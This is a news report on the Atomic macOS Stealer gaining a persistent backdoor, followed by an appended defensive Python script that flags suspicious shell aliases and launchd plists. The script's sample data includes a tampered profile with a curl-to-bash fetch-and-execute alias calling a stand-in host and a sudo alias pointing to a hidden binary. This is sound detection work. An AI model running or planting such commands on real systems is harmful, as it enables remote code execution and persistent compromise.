The notorious Atomic macOS Stealer (AMOS) malware has received a dangerous upgrade that significantly escalates the threat to Mac users worldwide. For the first time, this Russia-affiliated stealer is being deployed with an embedded backdoor, allowing attackers to maintain persistent access to compromised systems, execute remote commands, and establish long-term control over victim machines. This represents the most significant evolution of AMOS since its emergence, transforming what was once a “smash-and-grab” data theft tool into a platform for sustained surveillance and system compromise, and turning one-time breaches into long-term compromises.

According to cybersecurity researchers at Moonlock, MacPaw’s security division, this marks only the second known case of backdoor deployment targeting macOS users at a global scale, following similar tactics employed by North Korean threat actors. The AMOS operators appear to be following the pattern pioneered by those North Korean groups, who have successfully combined backdoors with stealers in macOS attacks. However, while North Korean groups typically focus on quick cryptocurrency theft, the AMOS backdoor is designed for long-term persistence and extended system compromise.

The upgraded AMOS employs two primary distribution methods: websites offering cracked or counterfeit software, and targeted spear-phishing campaigns against high-value individuals, particularly cryptocurrency holders. Once executed, the malware establishes persistence through a chain of components, including a trojanized DMG file, bash wrapper scripts, and Terminal aliases designed to bypass macOS Gatekeeper protections.

Security researchers have observed a rapid increase in unique AMOS binary samples since the beginning of 2024, indicating active development and deployment. The growth of the malware-as-a-service (MaaS) market suggests that more variants of the updated Atomic macOS Stealer will emerge, with enhanced detection evasion and system penetration capabilities.

Security experts recommend that Mac users employ additional anti-malware software, remain vigilant against social engineering, and reduce their digital footprint to minimize exposure to targeted attacks. The cybersecurity community continues to monitor AMOS operations, with researchers sharing threat intelligence to help security teams update their defenses against this evolving threat to macOS users worldwide.
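The persistence chain described above (bash wrapper scripts launched at login and aliases planted in a user's shell profile) is the kind of artifact a responder can triage without vendor signatures. The following Python script is an added example, not code from the article or from Moonlock: it parses launchd property lists with the standard-library plistlib and scans a zsh/bash profile for aliases, flagging generic red flags (a shell interpreter running a wrapper from a hidden path, an Apple-style label on a non-system binary, a download piped into a shell, an alias shadowing a common command). The sample profile text, plist contents, paths and labels are constructed for illustration and are not AMOS indicators; on a real host one would feed it the files under ~/Library/LaunchAgents, /Library/LaunchAgents, /Library/LaunchDaemons and the user's ~/.zshrc, ~/.zprofile and ~/.bash_profile.

```python
"""Triage two macOS persistence artifact classes: shell-profile aliases and
launchd plists starting shell wrappers. Heuristics only; samples are constructed."""
import os
import plistlib
import re
import shlex

SHELL_NAMES = {"bash", "sh", "zsh", "dash"}
# Commands a planted alias is likely to shadow so user-typed commands run attacker code.
COMMONLY_SHADOWED = {"sudo", "ls", "cd", "open", "ssh", "git", "curl", "python3", "brew"}
ALIAS_RE = re.compile(r"^\s*alias\s+([A-Za-z0-9_.-]+)=(.*)$")
FETCH_EXEC_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b")


def _unquote(s: str) -> str:
    s = s.strip()
    return s[1:-1] if len(s) >= 2 and s[0] == s[-1] and s[0] in "'\"" else s


def _has_hidden_component(path: str) -> bool:
    """True if any path component is a dot-file/dir (e.g. ~/Library/.helper)."""
    return any(c.startswith(".") and c not in (".", "..") for c in path.split("/"))


def _first_token(cmd: str) -> str:
    try:
        parts = shlex.split(cmd)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        parts = cmd.split()
    return parts[0] if parts else ""


def find_suspicious_aliases(profile_text: str) -> list:
    """Flag aliases in ~/.zshrc-style text that shadow common commands,
    execute a hidden-path binary, or pipe a download into a shell."""
    hits = []
    for line in profile_text.splitlines():
        m = ALIAS_RE.match(line)
        if not m:
            continue
        name, target = m.group(1), _unquote(m.group(2))
        reasons = []
        if name in COMMONLY_SHADOWED:
            reasons.append("shadows common command")
        if _has_hidden_component(_first_token(target)):
            reasons.append("runs binary from hidden path")
        if FETCH_EXEC_RE.search(target):
            reasons.append("fetch-and-execute")
        if reasons:
            hits.append({"alias": name, "target": target, "reasons": reasons})
    return hits


def assess_launchd_plist(plist_bytes: bytes) -> dict:
    """Parse a LaunchAgent/LaunchDaemon plist and flag shell wrappers that
    auto-start from hidden locations or hide behind an Apple-style label."""
    p = plistlib.loads(plist_bytes)
    args = list(p.get("ProgramArguments") or [])
    if not args and "Program" in p:
        args = [p["Program"]]
    label = str(p.get("Label", ""))
    result = {"label": label, "program": args[0] if args else None,
              "script": None, "findings": []}
    if not args:
        result["findings"].append("no Program/ProgramArguments")
        return result
    program = args[0]
    if os.path.basename(program) in SHELL_NAMES:
        # `bash [opts] script`: the script is the first non-option argument;
        # `bash -c 'cmd'`: that argument is the inline command string instead.
        script = next((a for a in args[1:] if not a.startswith("-")), None)
        result["script"] = script
        result["findings"].append("shell interpreter running a wrapper")
        if script and _has_hidden_component(script):
            result["findings"].append("wrapper script in hidden path")
    elif _has_hidden_component(program):
        result["findings"].append("program in hidden path")
    if label.startswith("com.apple.") and not program.startswith(("/System/", "/usr/")):
        result["findings"].append("Apple-style label for a non-system binary")
    # Auto-start alone is what legitimate agents do too; report it only with another flag.
    if result["findings"] and (p.get("RunAtLoad") or p.get("KeepAlive")):
        result["findings"].append("persists via RunAtLoad/KeepAlive")
    return result


# Constructed samples (not real indicators); example.invalid is a reserved TLD.
BENIGN_ZSHRC = "export PATH=\"$HOME/bin:$PATH\"\nalias ll='ls -la'\nalias gs='git status'\n"
TAMPERED_ZSHRC = ("alias sudo='/Users/victim/Library/.helper sudo'\n"
                  "alias update='curl -fsSL https://example.invalid/u.sh | bash'\n")
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict><key>Label</key><string>com.example.backup</string>
<key>ProgramArguments</key><array><string>/usr/local/bin/backup</string><string>--daily</string></array>
<key>RunAtLoad</key><true/></dict></plist>"""
TAMPERED_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict><key>Label</key><string>com.apple.updater.helper</string>
<key>ProgramArguments</key><array><string>/bin/bash</string><string>/Users/victim/Library/.agent</string></array>
<key>RunAtLoad</key><true/><key>KeepAlive</key><true/></dict></plist>"""

if __name__ == "__main__":
    for hit in find_suspicious_aliases(TAMPERED_ZSHRC):
        print("alias:", hit)
    for blob in (BENIGN_PLIST, TAMPERED_PLIST):
        print("plist:", assess_launchd_plist(blob))
```

The checks are deliberately generic: a LaunchAgent that runs `/bin/bash` against a dot-file under ~/Library with `KeepAlive` set is unusual for legitimate software regardless of which stealer planted it, and an alias for `sudo` that points anywhere outside `/usr/bin` deserves a look on any Mac. Treat every hit as a lead to verify (inspect the wrapper, check code signing and the quarantine attribute on what it launches), not as a conviction.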
This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 08 Jul 2025 10:05:12 +0000